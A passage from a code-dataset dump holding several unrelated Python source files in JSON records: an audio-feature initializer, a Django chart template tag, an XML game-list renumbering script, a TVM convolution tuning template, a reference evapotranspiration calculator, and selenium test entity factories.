'.npy')[start_test_class_index:end_test_class_index, :]\n for i in tqdm(range(test_feature_matrix_temp.shape[1])):\n # only consider selected classes\n if test_groundtruth_matrix_temp[:, i].sum() == 0:\n continue\n\n test_feature_matrix = np.concatenate((test_feature_matrix, test_feature_matrix_temp[:, i].reshape(-1, 1)), axis=1)\n test_groundtruth_matrix = np.concatenate((test_groundtruth_matrix, test_groundtruth_matrix_temp[:, i].reshape(-1, 1)), axis=1)\n\n # save the matrices\n k = 0\n train_feature_matrix_file_name = data_dir / 'fold{}_train_feature'.format(k)\n train_groundtruth_matrix_file_name = data_dir / 'fold{}_train_groundtruth'.format(k)\n test_feature_matrix_file_name = data_dir / 'fold{}_test_feature'.format(k)\n test_groundtruth_matrix_file_name = data_dir / 'fold{}_test_groundtruth'.format(k)\n np.save(str(train_feature_matrix_file_name), train_feature_matrix)\n np.save(str(train_groundtruth_matrix_file_name), train_groundtruth_matrix)\n np.save(str(test_feature_matrix_file_name), test_feature_matrix)\n np.save(str(test_groundtruth_matrix_file_name), test_groundtruth_matrix)\n\n @classmethod\n def generate_noisy_data(cls, noise_file_path='noise.wav'):\n deformer = BackgroundNoise(files=noise_file_path, n_samples=1, weight_max=0.21, weight_min=0.19)\n for audio_file_path in meta.train_audio_file_dir.iterdir():\n print('Processing {}.'.format(audio_file_path.name))\n jam_in = muda.load_jam_audio(jams.JAMS(), str(audio_file_path))\n jam_out = deformer.transform(jam_in)\n for result in jam_out:\n muda.save(str(meta.noisy_audio_file_dir / audio_file_path.name), 'temp.jams', result)\n\n\nif __name__ == '__main__':\n initializer = Initializer()\n # initializer.generate_noisy_data()\n # initializer.generate_feature_matrix()\n # initializer.generate_groundtruth_matrix()\n initializer.initialize_cross_validation()\n # initializer.initialize_test_data()\n","sub_path":"Initializer_oo.py","file_name":"Initializer_oo.py","file_ext":"py","file_size_in_byte":17562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"375480336","text":"import sys\nfrom django.core.urlresolvers import reverse\nfrom django import template\nfrom django.http import HttpRequest, HttpResponseForbidden\nfrom djchart.models import Chart\nfrom djchart.views import chart_data\n\nregister = template.Library()\n\ndef insert_chart_internals(pk, el_id, ajax=False):\n\ttry:\n\t\tchart = Chart.objects.get(pk=pk)\n\texcept:\n\t\treturn ''\n\tdef script(script_text):\n\t\treturn '' \\\n\t\t\t% script_text\n\tif ajax:\n\t\treturn script('ajaxChart(\"%(id)s\", \"%(path)s\", %(options)s);'\n\t\t\t% {\n\t\t\t\t'id': unicode(el_id),\n\t\t\t\t'path': reverse('chart_data', kwargs={'chart_pk': pk}),\n\t\t\t\t'options': any(chart.options) and chart.options or 'null',})\n\telse:\n\t\tdata_response = chart_data(HttpRequest(), pk)\n\t\tif isinstance(data_response, HttpResponseForbidden):\n\t\t\treturn ''\n\t\treturn script('$.jqplot(\"%(id)s\", %(data)s, %(options)s);'\n\t\t\t% {\n\t\t\t\t'id': unicode(el_id),\n\t\t\t\t'data': data_response.content,\n\t\t\t\t'options': any(chart.options) and chart.options or 'null',})\n\n@register.simple_tag\ndef insert_chart(pk, el_id, ajax=False):\n return insert_chart_internals(pk, el_id, ajax)\n","sub_path":"templatetags/chart_tags.py","file_name":"chart_tags.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"499568180","text":"# encoding=utf8\nimport xml.etree.ElementTree as ET\nimport shutil\nimport os\nimport zipfile\nimport json\nimport re\nfrom tqdm import tqdm\nimport requests.api\nfrom optparse import OptionParser\nfrom XmlDataLoader import XmlDataLoader\n\n# 利用logging.basicConfig()打印信息到控制台\nimport logging\nlogging.basicConfig(\n format='%(asctime)s [%(levelname)s] [%(pathname)s:%(lineno)d] [%(module)s] [%(funcName)s] >> %(message)s',\n level=logging.DEBUG\n)\n\n# 关闭requests的日志\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n\n\ndef load_en2chs(file):\n xdict = dict()\n f = open(file) # 返回一个文件对象\n line = f.readline() # 调用文件的 readline()方法\n while line:\n # print line, # 后面跟 ',' 将忽略换行符\n # print(line, end = '') # 在 Python 3中使用\n info = json.loads(line)\n xdict[info['en']] = info['chs']\n\n line = f.readline()\n f.close()\n return xdict\n\n\nif __name__ == \"__main__\":\n usage = ''\n parser = OptionParser(usage)\n parser.add_option(\"--dat\")\n parser.add_option(\"--output_xml\")\n\n (options, args) = parser.parse_args()\n\n xml_data_loader = XmlDataLoader()\n tree = xml_data_loader.load_xml_tree(options.dat)\n data = xml_data_loader.load(options.dat)\n\n count = 0\n index = 0\n no_chs_list = list()\n tree_games = tree.findall('games/game')\n pbar = tqdm(data['game_list'], ascii=True)\n for game in pbar:\n pbar.set_description(\"处理 %s\" % xml_data_loader.genGameName(game))\n pbar.update()\n\n count = count + 1\n # if count > 10:\n # break\n\n tree_game = tree_games[index]\n tree_game.find('releaseNumber').text = str(index + 1)\n tree_game.find('imageNumber').text = str(index + 1)\n # logging.info('releaseNumber: %s', tree_game.find('releaseNumber').text)\n # logging.info('imageNumber: %s', tree_game.find('imageNumber').text)\n index = index + 1\n pbar.close()\n\n if options.output_xml:\n xml_str = ET.tostring(tree, encoding='utf-8')\n xml_str = str(xml_str, encoding='utf-8')\n xml_file = open(options.output_xml, 'w', encoding='utf-8')\n xml_file.write(xml_str)\n xml_file.close()\n","sub_path":"scripts/OffLineList2playlist/datutils/XmlRenameGameNum.py","file_name":"XmlRenameGameNum.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"60732332","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n# pylint: disable=invalid-name, unused-argument\n\"\"\"Compute definition for fused_conv2d with cuda backend\"\"\"\nimport tvm\nfrom tvm import autotvm\n\nfrom ..fusion_composer import FusionComposer\n\n@autotvm.template('fused_conv2d.cuda')\ndef get_schedule_tuning_cuda(parameters):\n target = tvm.target.Target('cuda')\n fc = FusionComposer(parameters, target=target)\n\n # Get schedule\n schedule = fc.get_schedule(tuning=True)\n\n # Get compute\n compute = fc.get_compute()\n input_tensors = fc.make_placeholders()\n output_tensor = compute(input_tensors)\n all_tensors = input_tensors + [output_tensor]\n\n s = schedule(output_tensor)\n return s, all_tensors\n","sub_path":"python/tvm/topi/cuda/fused_conv2d.py","file_name":"fused_conv2d.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"357136623","text":"import numpy as np\nimport pandas as pd\nimport math\n\nfile = input('Choose a csv weather file with wind/RH/AirTemp/IncShortWaveRad:')\n#file = '/Users/mahanlab2/Desktop/Andrew Young/CT:ET models/PSWC_15minute_lubbock_2016_clean.csv'\ndf = pd.read_csv(file,header = 0)\n\n##Altitude for Lubbock Texas in meters\naltitude = float(992.4)\n##Assumed Albedo\nalbedo = float(0.23)\n##Stefan Boltzman Constant\nsbc = 2.042 * (10**-10)\n##Latent heat of vaporization (MJ/kg)\nlhv = 2.45\n##Atmosperic pressure (kPa)\ndf['Atmosperic_Pressure'] = 101.3*((293-0.0065*altitude)/293)**5.26\n##Psychometric Constant (kPA/C)\ndf['Psychometric_Constant'] = 0.000665*df['Atmosperic_Pressure']\n##Air temperature in C\ndf['Tair_C'] = df['avgt.C']\n##Air Temperature in K\ndf['Tair_K'] = df['Tair_C'] + 273.2\n##Air Speed average Column##\ndf['meanU.2m.m/s'] = df['wind.2m.m/s']\n##Slope (svp vs air temp)(kPa/C)\ndf['Slope'] = (2503 * np.exp(17.27*df['Tair_C']/(df['Tair_C']+237.3))/(df['Tair_C']+237.3)**2)\n#Saturated Vapor Pressure (kPa)\ndf['Saturated_Vapor_Pressure'] = 0.61078*np.exp((17.269*df['Tair_C'])/(237.3+df['Tair_C']))\n#Actual Vapor Pressure (kPa)\ndf['Actual_Vapor_Pressure'] = (df['avgRH.%']/100)*df['Saturated_Vapor_Pressure']\n#Vapor Pressure Deficit (kPa)\ndf['Vapor_pressure_deficit'] = df['Saturated_Vapor_Pressure']-df['Actual_Vapor_Pressure']\n#Net Shortwave Irradiance (W/m2)\ndf['Net_Shortwave_Irradiance'] = (1-albedo)*df['radn.W/m2']\n#Net Shortwave Irradiance (MJ/(m2*hour))\ndf['Net_Shortwave_Irradiance_MJ'] = df['Net_Shortwave_Irradiance']*(3600/1000000)\n#Net Outgoing Long Wave Irradiance (MJ/(m2*hour))\ndf['Net Outgoing Long Wave Irradiance (MJ/(m2*hour))'] = 0.8*sbc*(0.34-0.14*np.sqrt(df['Actual_Vapor_Pressure']))*df['Tair_K']**4\n#Net Outgoing Long Wave Irradiance (W/m2)\ndf['Net Outgoing Long Wave Irradiance (W/m2)'] = (df['Net Outgoing Long Wave Irradiance (MJ/(m2*hour))']/3600)*1000000\n#Net Irradiance in (W/m2) Rn\ndf['Rn_W/m2'] = df['Net_Shortwave_Irradiance'] - df['Net Outgoing Long Wave Irradiance (W/m2)']\n#Net Irradiance in (MJ/(m2*hour)) Rn\ndf['Rn_(MJ/(m2*hour))'] = df['Net_Shortwave_Irradiance_MJ'] - df['Net Outgoing Long Wave Irradiance (MJ/(m2*hour))']\n#Soil Heat Flux Density (W/m2)\ndf['Soil Heat Flux Density (W/m2)'] = 0.5 * df['Rn_W/m2']\n#Soil Heat Flux Density (MJ/(m2*hour))\ndf['Soil Heat Flux Density (MJ/(m2*hour))'] = df['Soil Heat Flux Density (W/m2)']*(3600/1000000)\n#numerator constant for hourly\ndf['Numerator Constant'] = 37\n###numerator constant for 15-min###\n#df['Numerator Constant'] = 9.25\n##### Numerator constant for Daily Data #####\n#df['Numerator Constant'] = 900\n#Denominator Constant 0.96 for night and 0.24 for day for hourly rates\ndf['Denominator Constant'] = np.where(df['radn.W/m2'] >0, 0.24, 0.96)\n###Denominator Constant 0.24 for night and 0.06 for day for 15-min rates###\n#df['Denominator Constant'] = np.where(df['radn.W/m2'] >0, 0.06, 0.24)\n##### Denominator Constant 0.34 constant for Daily Data #####\n#df['Denominator Constant'] = 0.34\n#Reference ET Calculations mm/h (short crop)\ndf['Reference ET mm/hour'] = (0.408 * df['Slope'] * (df['Rn_(MJ/(m2*hour))'] - df['Soil Heat Flux Density (MJ/(m2*hour))']) + df['Psychometric_Constant'] * (df['Numerator Constant'] / (df['Tair_C'] + 273)) * df['meanU.2m.m/s'] * df['Vapor_pressure_deficit'])\\\n / ( df['Slope'] + df['Psychometric_Constant'] * ( 1 + (df['Denominator Constant'] * df['meanU.2m.m/s'])))\n#Reference ET Calculations MJ/(m2*hour) (short crop)\ndf['Reference ET (MJ/(m2*hour))'] = df['Reference ET mm/hour']*2.45\n#Sensible Heat\ndf['Sensible Heat (MJ/(m2*hour))'] = (df['Soil Heat Flux Density (MJ/(m2*hour))']+df['Rn_(MJ/(m2*hour))'])-df['Reference ET (MJ/(m2*hour))']\n#Energy Balance\ndf['Energy Balance'] = df['Soil Heat Flux Density (MJ/(m2*hour))'] + df['Rn_(MJ/(m2*hour))'] - df['Reference ET (MJ/(m2*hour))'] - df['Sensible Heat (MJ/(m2*hour))']\nprint(df[60:70])\n#df2 = df[['DOY','TimeNo24','year','Rn_W/m2','Rn_(MJ/(m2*hour))','Reference ET mm/h','Reference ET (MJ/(m2*hour))']].copy()\ndf2 = df[['DOY','Rn_W/m2','Rn_(MJ/(m2*hour))','Reference ET mm/hour','Reference ET (MJ/(m2*hour))']].copy()\ndata = ((df.groupby(['DOY'])['maxt.C'].max() + df.groupby(['DOY'])['mint.C'].min()) / 2) - 15.5\ndf3 = pd.DataFrame(data=data,columns= ['GDU_calc'])\ndf3['GDU_calc'] = np.where(df3['GDU_calc'] < 0, 0, df3['GDU_calc'])\ndf3['DOY'] = range(1, len(df3)+1)\ndf['Filter_Ref'] = np.where(df['Reference ET mm/hour'] < 0, 0, df['Reference ET mm/hour'])\ndf3['Daily Ref ET mm/hour'] = df.groupby(['DOY'])['Filter_Ref'].sum()\n#df3['Daily Ref ET mm/h Sum'] = df.groupby(['DOY'])['Filter_Ref'].sum()\n#df3['Daily Ref ET mm/hour'] = df3['Daily Ref ET mm/h'] * 24\n\ndf.to_csv(file + '_RefET.csv')\ndf2.to_csv(file + 'Rn_RefET.csv')\ndf3.to_csv(file + 'GDU.csv')","sub_path":"Hourly_ASCE_ET.py","file_name":"Hourly_ASCE_ET.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"89023728","text":"# Copyright (C) 2017 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\"\"\"Factories that create entities.\"\"\"\n# pylint: disable=too-many-arguments\n# pylint: disable=invalid-name\n# pylint: disable=redefined-builtin\n\n\nimport copy\nimport random\n\nimport re\nfrom lib.constants import element, objects, roles, url as const_url\nfrom lib.constants.element import AdminWidgetCustomAttrs\nfrom lib.entities import entity\nfrom lib.utils import string_utils\nfrom lib.utils.string_utils import (random_list_strings, random_string,\n random_uuid)\n\n\nclass EntitiesFactory(object):\n \"\"\"Common factory class for entities.\"\"\"\n # pylint: disable=too-few-public-methods\n obj_person = objects.get_singular(objects.PEOPLE)\n obj_program = objects.get_singular(objects.PROGRAMS)\n obj_control = objects.get_singular(objects.CONTROLS)\n obj_audit = objects.get_singular(objects.AUDITS)\n obj_asmt_tmpl = objects.get_singular(objects.ASSESSMENT_TEMPLATES)\n obj_asmt = objects.get_singular(objects.ASSESSMENTS)\n obj_issue = objects.get_singular(objects.ISSUES)\n\n all_objs_attrs_names = tuple(entity.Entity().attrs_names_all_entities())\n\n @classmethod\n def update_obj_attrs_values(cls, obj, attrs_names=all_objs_attrs_names,\n **arguments):\n \"\"\"Update object's (obj) attributes values according to list of\n unique possible objects' names and dictionary of arguments (key = value).\n \"\"\"\n # pylint: disable=expression-not-assigned\n [setattr(obj, attr_name, arguments[attr_name]) for\n attr_name in attrs_names if arguments.get(attr_name)]\n return obj\n\n @classmethod\n def generate_title(cls, obj_type):\n \"\"\"Generate title according object type and random data.\"\"\"\n special_chars = string_utils.SPECIAL\n return \"{obj_type}_{uuid}_{rand_str}\".format(\n obj_type=obj_type, uuid=random_uuid(),\n rand_str=random_string(size=len(special_chars), chars=special_chars))\n\n @classmethod\n def generate_code(cls):\n \"\"\"Generate code according str part and random data.\"\"\"\n return \"{code}\".format(code=random_uuid())\n\n @classmethod\n def generate_email(cls, domain=const_url.DEFAULT_EMAIL_DOMAIN):\n \"\"\"Generate email according domain.\"\"\"\n return \"{mail_name}@{domain}\".format(\n mail_name=random_uuid(), domain=domain)\n\n\nclass PersonsFactory(EntitiesFactory):\n \"\"\"Factory class for Persons entities.\"\"\"\n\n @classmethod\n def default(cls):\n \"\"\"Create default system Person object.\"\"\"\n return cls.create(\n title=roles.DEFAULT_USER, id=1, href=const_url.DEFAULT_USER_HREF,\n email=const_url.DEFAULT_USER_EMAIL, authorizations=roles.SUPERUSER)\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n email=None, authorizations=None):\n \"\"\"Create Person object.\n Random values will be used for title aka name.\n Predictable values will be used for mail and system_wide_role.\n \"\"\"\n person_entity = cls._create_random_person()\n person_entity = cls.update_obj_attrs_values(\n obj=person_entity, title=title, id=id, href=href, url=url, type=type,\n email=email, authorizations=authorizations)\n return person_entity\n\n @classmethod\n def _create_random_person(cls):\n \"\"\"Create Person entity with randomly filled fields.\"\"\"\n random_person = entity.PersonEntity()\n random_person.title = cls.generate_title(cls.obj_person)\n random_person.type = cls.obj_person\n random_person.email = cls.generate_email()\n random_person.authorizations = roles.NO_ROLE\n return random_person\n\n\nclass CAFactory(EntitiesFactory):\n \"\"\"Factory class for Custom Attributes entities.\"\"\"\n\n @classmethod\n def create(cls, title=None, ca_type=None, definition_type=None, helptext=\"\",\n placeholder=None, multi_choice_options=None, is_mandatory=False,\n ca_global=True):\n \"\"\"Create CustomAttribute object.\n Random values will be used for title, ca_type, definition_type and\n multi_choice_options if they are None.\n \"\"\"\n ca_entity = cls._create_random_ca()\n ca_entity = cls._fill_ca_entity_fields(\n ca_entity, title=title,\n ca_type=ca_type, definition_type=definition_type, helptext=helptext,\n placeholder=placeholder, multi_choice_options=multi_choice_options,\n is_mandatory=is_mandatory, ca_global=ca_global)\n ca_entity = cls._normalize_ca_definition_type(ca_entity)\n return ca_entity\n\n @classmethod\n def _create_random_ca(cls):\n \"\"\"Create CustomAttribute entity with randomly filled fields.\"\"\"\n random_ca = entity.CustomAttributeEntity()\n random_ca.ca_type = random.choice(AdminWidgetCustomAttrs.ALL_ATTRS_TYPES)\n random_ca.title = cls.generate_title(random_ca.ca_type)\n random_ca.definition_type = random.choice(objects.ALL_CA_OBJECTS)\n return random_ca\n\n @classmethod\n def _fill_ca_entity_fields(cls, ca_object, **ca_object_fields):\n \"\"\"Set CustomAttributes object's attributes.\"\"\"\n if ca_object_fields.get(\"ca_type\"):\n ca_object.ca_type = ca_object_fields[\"ca_type\"]\n ca_object.title = cls.generate_title(ca_object.ca_type)\n if ca_object_fields.get(\"definition_type\"):\n ca_object.definition_type = ca_object_fields[\"definition_type\"]\n if ca_object_fields.get(\"title\"):\n ca_object.title = ca_object_fields[\"definition_type\"]\n # \"Placeholder\" field exists only for Text and Rich Text.\n if (ca_object_fields.get(\"placeholder\") and\n ca_object.ca_type in (AdminWidgetCustomAttrs.TEXT,\n AdminWidgetCustomAttrs.RICH_TEXT)):\n ca_object.placeholder = ca_object_fields[\"placeholder\"]\n if ca_object_fields.get(\"helptext\"):\n ca_object.helptext = ca_object_fields[\"helptext\"]\n if ca_object_fields.get(\"is_mandatory\"):\n ca_object.is_mandatory = ca_object_fields[\"is_mandatory\"]\n if ca_object_fields.get(\"ca_global\"):\n ca_object.ca_global = ca_object_fields[\"ca_global\"]\n # \"Possible Values\" - is a mandatory field for dropdown CustomAttribute.\n if ca_object.ca_type == AdminWidgetCustomAttrs.DROPDOWN:\n if (ca_object_fields.get(\"multi_choice_options\") and\n ca_object_fields[\"multi_choice_options\"] is not None):\n ca_object.multi_choice_options =\\\n ca_object_fields[\"multi_choice_options\"]\n else:\n ca_object.multi_choice_options = random_list_strings(list_len=3)\n return ca_object\n\n @classmethod\n def _normalize_ca_definition_type(cls, ca_object):\n \"\"\"Transform definition type to title form.\n Title from used for UI operations.\n For REST operations definition type should be interpreted as\n objects.get_singular().get_object_name_form().\n \"\"\"\n ca_object.definition_type = objects.get_normal_form(\n ca_object.definition_type\n )\n return ca_object\n\n\nclass ProgramsFactory(EntitiesFactory):\n \"\"\"Factory class for Programs entities.\"\"\"\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Program object.\"\"\"\n empty_program = entity.ProgramEntity()\n empty_program.type = cls.obj_program\n return empty_program\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n manager=None, primary_contact=None, code=None, state=None,\n last_update=None):\n \"\"\"Create Program object.\n Random values will be used for title and code.\n Predictable values will be used for type, manager, primary_contact, state.\n \"\"\"\n program_entity = cls._create_random_program()\n program_entity = cls.update_obj_attrs_values(\n obj=program_entity, title=title, id=id, href=href, url=url, type=type,\n manager=manager, primary_contact=primary_contact, code=code,\n state=state, last_update=last_update)\n return program_entity\n\n @classmethod\n def _create_random_program(cls):\n \"\"\"Create Program entity with randomly and predictably filled fields.\"\"\"\n random_program = entity.ProgramEntity()\n random_program.title = cls.generate_title(cls.obj_program)\n random_program.type = cls.obj_program\n random_program.code = cls.generate_code()\n random_program.manager = roles.DEFAULT_USER\n random_program.primary_contact = roles.DEFAULT_USER\n random_program.state = element.ObjectStates.DRAFT\n return random_program\n\n\nclass ControlsFactory(EntitiesFactory):\n \"\"\"Factory class for Controls entities.\"\"\"\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Control object.\"\"\"\n empty_control = entity.ControlEntity()\n empty_control.type = cls.obj_control\n return empty_control\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n owner=None, primary_contact=None, code=None, state=None,\n last_update=None):\n \"\"\"Create Control object.\n Random values will be used for title and code.\n Predictable values will be used for type, owner, primary_contact, state.\n \"\"\"\n control_entity = cls._create_random_control()\n control_entity = cls.update_obj_attrs_values(\n obj=control_entity, title=title, id=id, href=href, url=url, type=type,\n owner=owner, primary_contact=primary_contact, code=code, state=state,\n last_update=last_update)\n return control_entity\n\n @classmethod\n def _create_random_control(cls):\n \"\"\"Create Control entity with randomly and predictably filled fields.\"\"\"\n random_control = entity.ControlEntity()\n random_control.title = cls.generate_title(cls.obj_control)\n random_control.type = cls.obj_control\n random_control.code = cls.generate_code()\n random_control.owner = roles.DEFAULT_USER\n random_control.primary_contact = roles.DEFAULT_USER\n random_control.state = element.ObjectStates.DRAFT\n return random_control\n\n\nclass AuditsFactory(EntitiesFactory):\n \"\"\"Factory class for Audit entity.\"\"\"\n\n @classmethod\n def clone(cls, audit, count_to_clone=1):\n \"\"\"Clone Audit object.\n Predictable values will be used for title, id, href, url, code.\n \"\"\"\n # pylint: disable=anomalous-backslash-in-string\n from lib.service.rest_service import ObjectsInfoService\n actual_count_all_audits = ObjectsInfoService().get_total_count(\n obj_name=objects.get_normal_form(cls.obj_audit, with_space=False))\n if actual_count_all_audits == audit.id:\n return [\n cls.update_obj_attrs_values(\n obj=copy.deepcopy(audit),\n title=audit.title + \" - copy \" + str(num), id=audit.id + num,\n href=re.sub(\"\\d+$\", str(audit.id + num), audit.href),\n url=re.sub(\"\\d+$\", str(audit.id + num), audit.url),\n code=(cls.obj_audit.upper() + \"-\" + str(audit.id + num))) for\n num in xrange(1, count_to_clone + 1)]\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Audit object.\"\"\"\n empty_audit = entity.AuditEntity()\n empty_audit.type = cls.obj_audit\n return empty_audit\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n program=None, audit_lead=None, code=None, status=None,\n last_update=None):\n \"\"\"Create Audit object.\n Random values will be used for title and code.\n Predictable values will be used for type, audit_lead, status.\n \"\"\"\n audit_entity = cls._create_random_audit()\n audit_entity = cls.update_obj_attrs_values(\n obj=audit_entity, title=title, id=id, href=href, url=url, type=type,\n program=program, audit_lead=audit_lead, code=code, status=status,\n last_update=last_update)\n return audit_entity\n\n @classmethod\n def _create_random_audit(cls):\n \"\"\"Create Audit entity with randomly and predictably filled fields.\"\"\"\n random_audit = entity.AuditEntity()\n random_audit.title = cls.generate_title(cls.obj_audit)\n random_audit.type = cls.obj_audit\n random_audit.code = cls.generate_code()\n random_audit.audit_lead = roles.DEFAULT_USER\n random_audit.status = element.AuditStates().PLANNED\n return random_audit\n\n\nclass AssessmentTemplatesFactory(EntitiesFactory):\n \"\"\"Factory class for Assessment Templates entities.\"\"\"\n\n @classmethod\n def clone(cls, asmt_tmpl, count_to_clone=1):\n \"\"\"Clone Assessment Template object.\n Predictable values will be used for title, id, href, url, code.\n \"\"\"\n # pylint: disable=anomalous-backslash-in-string\n from lib.service.rest_service import ObjectsInfoService\n actual_count_all_asmt_tmpls = ObjectsInfoService().get_total_count(\n obj_name=objects.get_normal_form(cls.obj_asmt_tmpl, with_space=False))\n if actual_count_all_asmt_tmpls == asmt_tmpl.id:\n return [\n cls.update_obj_attrs_values(\n obj=copy.deepcopy(asmt_tmpl), id=asmt_tmpl.id + num,\n href=re.sub(\"\\d+$\", str(asmt_tmpl.id + num), asmt_tmpl.href),\n url=re.sub(\"\\d+$\", str(asmt_tmpl.id + num), asmt_tmpl.url),\n code=(\"TEMPLATE-\" + str(asmt_tmpl.id + num))) for\n num in xrange(1, count_to_clone + 1)]\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Assessment Template object.\"\"\"\n empty_asmt_tmpl = entity.AssessmentTemplateEntity()\n empty_asmt_tmpl.type = cls.obj_asmt_tmpl\n return empty_asmt_tmpl\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n audit=None, asmt_objects=None, def_assessors=None,\n def_verifiers=None, code=None, last_update=None):\n \"\"\"Create Assessment Template object.\n Random values will be used for title and code.\n Predictable values will be used for type, asmt_objects, def_assessors,\n def_verifiers.\n \"\"\"\n asmt_tmpl_entity = cls._create_random_asmt_tmpl()\n asmt_tmpl_entity = cls.update_obj_attrs_values(\n obj=asmt_tmpl_entity, title=title, id=id, href=href, url=url,\n type=type, audit=audit, asmt_objects=asmt_objects,\n def_assessors=def_assessors, def_verifiers=def_verifiers, code=code,\n last_update=last_update)\n return asmt_tmpl_entity\n\n @classmethod\n def _create_random_asmt_tmpl(cls):\n \"\"\"Create Assessment Template entity with randomly and predictably\n filled fields.\n \"\"\"\n random_asmt_tmpl = entity.AssessmentTemplateEntity()\n random_asmt_tmpl.title = cls.generate_title(cls.obj_asmt_tmpl)\n random_asmt_tmpl.type = cls.obj_asmt_tmpl\n random_asmt_tmpl.code = cls.generate_code()\n random_asmt_tmpl.asmt_objects = objects.CONTROLS\n random_asmt_tmpl.def_assessors = roles.OBJECT_OWNERS\n random_asmt_tmpl.def_verifiers = roles.OBJECT_OWNERS\n return random_asmt_tmpl\n\n\nclass AssessmentsFactory(EntitiesFactory):\n \"\"\"Factory class for Assessments entities.\"\"\"\n\n @classmethod\n def generate(cls, objs_under_asmt_tmpl, audit):\n \"\"\"Generate Assessment object.\n Predictable values will be used for title, code, audit.\n \"\"\"\n # pylint: disable=too-many-locals\n from lib.service.rest_service import ObjectsInfoService\n actual_count_all_asmts = ObjectsInfoService().get_total_count(\n obj_name=objects.get_normal_form(cls.obj_asmt, with_space=False))\n return [\n cls.create(\n title=obj_under_asmt_tmpl.title + \" assessment for \" + audit.title,\n code=(cls.obj_asmt.upper() + \"-\" + str(asmt_number)),\n audit=audit.title) for asmt_number, obj_under_asmt_tmpl in\n enumerate(objs_under_asmt_tmpl, start=actual_count_all_asmts + 1)]\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Assessment object.\"\"\"\n empty_asmt = entity.AssessmentEntity()\n empty_asmt.type = cls.obj_asmt\n return empty_asmt\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n object=None, audit=None, creators=None, assignees=None,\n primary_contact=None, is_verified=None, code=None, state=None,\n last_update=None):\n \"\"\"Create Assessment object.\n Random values will be used for title and code.\n Predictable values will be used for type, object, creators, assignees,\n state, is_verified.\n \"\"\"\n # pylint: disable=too-many-locals\n asmt_entity = cls._create_random_asmt()\n asmt_entity = cls.update_obj_attrs_values(\n obj=asmt_entity, title=title, id=id, href=href, url=url, type=type,\n object=object, audit=audit, creators=creators, assignees=assignees,\n primary_contact=primary_contact, is_verified=is_verified, code=code,\n state=state, last_update=last_update)\n return asmt_entity\n\n @classmethod\n def _create_random_asmt(cls):\n \"\"\"Create Assessment entity with randomly and predictably filled fields.\"\"\"\n random_asmt = entity.AssessmentEntity()\n random_asmt.title = cls.generate_title(cls.obj_asmt)\n random_asmt.type = cls.obj_asmt\n random_asmt.code = cls.generate_code()\n random_asmt.object = roles.DEFAULT_USER\n random_asmt.creators = roles.DEFAULT_USER\n random_asmt.assignees = roles.DEFAULT_USER\n random_asmt.state = element.AssessmentStates.NOT_STARTED\n random_asmt.is_verified = element.Common.FALSE\n return random_asmt\n\n\nclass IssuesFactory(EntitiesFactory):\n \"\"\"Factory class for Issues entities.\"\"\"\n\n @classmethod\n def create_empty(cls):\n \"\"\"Create blank Issue object.\"\"\"\n empty_issue = entity.IssueEntity\n empty_issue.type = cls.obj_issue\n return empty_issue\n\n @classmethod\n def create(cls, title=None, id=None, href=None, url=None, type=None,\n audit=None, owner=None, primary_contact=None, code=None,\n state=None, last_update=None):\n \"\"\"Create Issue object.\n Random values will be used for title and code.\n Predictable values will be used for type, owner, primary_contact, state.\n \"\"\"\n issue_entity = cls._create_random_issue()\n issue_entity = cls.update_obj_attrs_values(\n obj=issue_entity, title=title, id=id, href=href, url=url, type=type,\n audit=audit, owner=owner, primary_contact=primary_contact, code=code,\n state=state, last_update=last_update)\n return issue_entity\n\n @classmethod\n def _create_random_issue(cls):\n \"\"\"Create Issue entity with randomly and predictably filled fields.\"\"\"\n random_issue = entity.IssueEntity()\n random_issue.title = cls.generate_title(cls.obj_issue)\n random_issue.type = cls.obj_issue\n random_issue.code = cls.generate_code()\n random_issue.owner = roles.DEFAULT_USER\n random_issue.primary_contact = roles.DEFAULT_USER\n random_issue.state = element.IssueStates.DRAFT\n return random_issue\n","sub_path":"test/selenium/src/lib/entities/entities_factory.py","file_name":"entities_factory.py","file_ext":"py","file_size_in_byte":18414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"653234425","text":"import serial as ser\nimport time\ncommands=['D2 HIGH','D2 LOW',\n\t\t'D3 HIGH', 'D3 LOW',\n\t\t'D4 HIGH', 'D4 LOW',\n\t\t'D5 HIGH', 'D5 LOW',\n\t\t'D6 HIGH', 'D6 LOW',\n\t\t'D7 HIGH', 'D7 LOW',\n\t\t'D8 HIGH', 'D8 